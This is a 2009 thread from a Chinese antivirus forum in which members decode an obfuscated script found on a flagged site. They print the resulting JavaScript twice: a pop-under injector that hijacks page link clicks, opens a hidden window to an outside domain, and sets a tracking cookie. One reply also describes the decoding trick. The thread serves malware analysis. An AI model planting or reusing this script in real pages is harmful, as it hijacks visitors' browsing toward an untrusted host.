查看: 1840|回复: 5
收起左侧

[已鉴定] hXXp://www.patria-nova.de/user

[复制链接]
molicn
发表于 2009-1-14 02:01:15 | 显示全部楼层 |阅读模式
麻烦谁会解这种新加密!
雨宫优子
发表于 2009-1-14 08:34:15 | 显示全部楼层
飘忽..
慢慢看...
雨宫优子
发表于 2009-1-14 08:50:06 | 显示全部楼层
  1. if (navigator.cookieEnabled)
  2. {
  3.    var pop_under = null;
  4.    var pop_cookie_name = "advmaker_komap";
  5.    var pop_timeout = 720;
  6.    function pop_cookie_enabled()
  7.    {
  8.      var is_enabled = false;
  9.      if (!window.opera && !navigator.cookieEnabled)return is_enabled;
  10.      if (typeof document.cookie == 'string')if (document.cookie.length == 0)
  11.      {
  12.        document.cookie = "test";
  13.        is_enabled = document.cookie == 'test';
  14.        document.cookie = '';
  15.      }
  16.      else
  17.      {
  18.        is_enabled = true;
  19.      }
  20.      return is_enabled;
  21.    }
  22.    function pop_getCookie(name)
  23.    {
  24.      var cookie = " " + document.cookie;
  25.      var search = " " + name + "=";
  26.      var setStr = null;
  27.      var offset = 0;
  28.      var end = 0;
  29.      if (cookie.length > 0)
  30.      {
  31.        offset = cookie.indexOf(search);
  32.        if (offset != -1)
  33.        {
  34.          offset += search.length;
  35.          end = cookie.indexOf(";", offset);
  36.          if (end == -1)
  37.          {
  38.            end = cookie.length;
  39.          }
  40.          setStr = unescape(cookie.substring(offset, end));
  41.        }
  42.      }
  43.      return(setStr);
  44.    }
  45.    function pop_setCookie (name, value)
  46.    {
  47.      document.cookie = name + "=" + escape(value) + "; expires=Friday,31-Dec-50 23:59:59 GMT; path=/;";
  48.    }
  49.    function show_pop()
  50.    {
  51.      var pop_wnd = "http://cfjmlauno.com/ld/dxtrbc/";
  52.      var fea_wnd = "scrollbars=›esizable=1,toolbar=1,location=1,menubar=1,status=1,directories=0";
  53.      var need_open = true;
  54.      if (document.onclick_copy != null)document.onclick_copy();
  55.      if (document.body.onbeforeunload_copy != null)document.body.onbeforeunload_copy();
  56.      if (pop_under != null)
  57.      {
  58.        if (!pop_under.closed)need_open = false;
  59.      }
  60.      if (need_open)
  61.      {
  62.        if (pop_cookie_enabled())
  63.        {
  64.          val = pop_getCookie(pop_cookie_name);
  65.          if (val != null)
  66.          {
  67.            now = new Date();
  68.            val2 = new Date(val);
  69.            utc32 = Date.UTC(now.getFullYear(), now.getMonth(), now.getDate(), now.getHours(), now.getMinutes(), now.getSeconds());
  70.            utc2 = Date.UTC(val2.getFullYear(), val2.getMonth(), val2.getDate(), val2.getHours(), val2.getMinutes(), val2.getSeconds());
  71.            if ( ( utc32 - utc2 ) / 1000 < pop_timeout*60)
  72.            {
  73.              need_open = false;
  74.            }
  75.          }
  76.        }
  77.      }
  78.      if (need_open)
  79.      {
  80.        under = window.open(pop_wnd, "", fea_wnd);
  81.        under.blur();
  82.        window.focus();
  83.        if (pop_cookie_enabled())
  84.        {
  85.          now = new Date();
  86.          pop_setCookie(pop_cookie_name, now);
  87.        }
  88.      }
  89.    }
  90.    function pop_init()
  91.    {
  92.      var ver = parseFloat(navigator.appVersion);
  93.      var ver2 = (navigator.userAgent.indexOf("Windows 95")>=0 || navigator.userAgent.indexOf("Windows 98")>=0 || navigator.userAgent.indexOf("Windows NT")>=0 )&&(navigator.userAgent.indexOf('Opera') == -1)&&(navigator.appName != 'Netscape') &&(navigator.userAgent.indexOf('MSIE') > -1) &&(navigator.userAgent.indexOf('SV1') > -1) &&(ver >= 4);
  94.      if (ver2)
  95.      {
  96.        if (document.links)
  97.        {
  98.          for (var i=0; i<document.links.length; i++)
  99.          {
  100.            if (document.links[i].target != "_blank")
  101.            {
  102.              document.links[i].onclick_copy = document.links[i].onclick;
  103.              document.links[i].onclick = show_pop;
  104.            }
  105.          }
  106.        }
  107.      }
  108.      document.onclick_copy = document.onclick;
  109.      document.onmouseup = show_pop;
  110.    }
  111. pop_init();}
复制代码

别问我怎么解的..我也不知道
万能法....没办法...还是只能求助于万能法
雨宫优子
发表于 2009-1-14 08:59:58 | 显示全部楼层
这步后似乎就没有什么了..
granthill
发表于 2009-1-14 16:35:44 | 显示全部楼层

回复 1楼 molicn 的帖子

复<script></script>间的内容

顶部 <textarea id="textareaID" rows="50" cols="100"></textarea>

修改最后的document.write 为document.getElementById("textareaID").innerText=

运行
  1. <script language="javascript">if (navigator.cookieEnabled){var pop_under = null;var pop_cookie_name = "advmaker_komap";var pop_timeout = 720;function pop_cookie_enabled(){var is_enabled = false;if (!window.opera && !navigator.cookieEnabled)return is_enabled;if (typeof document.cookie == 'string')if (document.cookie.length == 0){document.cookie = "test";is_enabled = document.cookie == 'test';document.cookie = '';}else{is_enabled = true;}return is_enabled;}function pop_getCookie(name){var cookie = " " + document.cookie;var search = " " + name + "=";var setStr = null;var offset = 0;var end = 0;if (cookie.length > 0){offset = cookie.indexOf(search);if (offset != -1){offset += search.length;end = cookie.indexOf(";", offset);if (end == -1){end = cookie.length;}setStr = unescape(cookie.substring(offset, end));}}return(setStr);}function pop_setCookie (name, value){document.cookie = name + "=" + escape(value) + "; expires=Friday,31-Dec-50 23:59:59 GMT; path=/;";}function show_pop(){var pop_wnd = "http://cfjmlauno.com/ld/dxtrbc/";var fea_wnd = "scrollbars=›esizable=1,toolbar=1,location=1,menubar=1,status=1,directories=0";var need_open = true;if (document.onclick_copy != null)document.onclick_copy();if (document.body.onbeforeunload_copy != null)document.body.onbeforeunload_copy();if (pop_under != null){if (!pop_under.closed)need_open = false;}if (need_open){if (pop_cookie_enabled()){val = pop_getCookie(pop_cookie_name);if (val != null){now = new Date();val2 = new Date(val);utc32 = Date.UTC(now.getFullYear(), now.getMonth(), now.getDate(), now.getHours(), now.getMinutes(), now.getSeconds());utc2 = Date.UTC(val2.getFullYear(), val2.getMonth(), val2.getDate(), val2.getHours(), val2.getMinutes(), val2.getSeconds());if ( ( utc32 - utc2 ) / 1000 < pop_timeout*60){need_open = false;}}}}if (need_open){under = window.open(pop_wnd, "", fea_wnd);under.blur();window.focus();if (pop_cookie_enabled()){now = new Date();pop_setCookie(pop_cookie_name, now);}}}function pop_init(){var ver = parseFloat(navigator.appVersion);var ver2 = (navigator.userAgent.indexOf("Windows 95")>=0 || navigator.userAgent.indexOf("Windows 98")>=0 || navigator.userAgent.indexOf("Windows NT")>=0 )&&(navigator.userAgent.indexOf('Opera') == -1)&&(navigator.appName != 'Netscape') &&(navigator.userAgent.indexOf('MSIE') > -1) &&(navigator.userAgent.indexOf('SV1') > -1) &&(ver >= 4);if (ver2){if (document.links){for (var i=0; i<document.links.length; i++){if (document.links[i].target != "_blank"){document.links[i].onclick_copy = document.links[i].onclick;document.links[i].onclick = show_pop;}}}}document.onclick_copy = document.onclick;document.onmouseup = show_pop;}pop_init();}</script>
复制代码
具体啥意思不懂 只知道弹框框http://cfjmlauno.com/ld/dxtrbc/

[ 本帖最后由 granthill 于 2009-1-14 16:37 编辑 ]
jimmyleo
发表于 2009-1-14 16:59:55 | 显示全部楼层
maybe 只是 popup
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-11-15 17:51 , Processed in 0.121497 second(s), 16 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表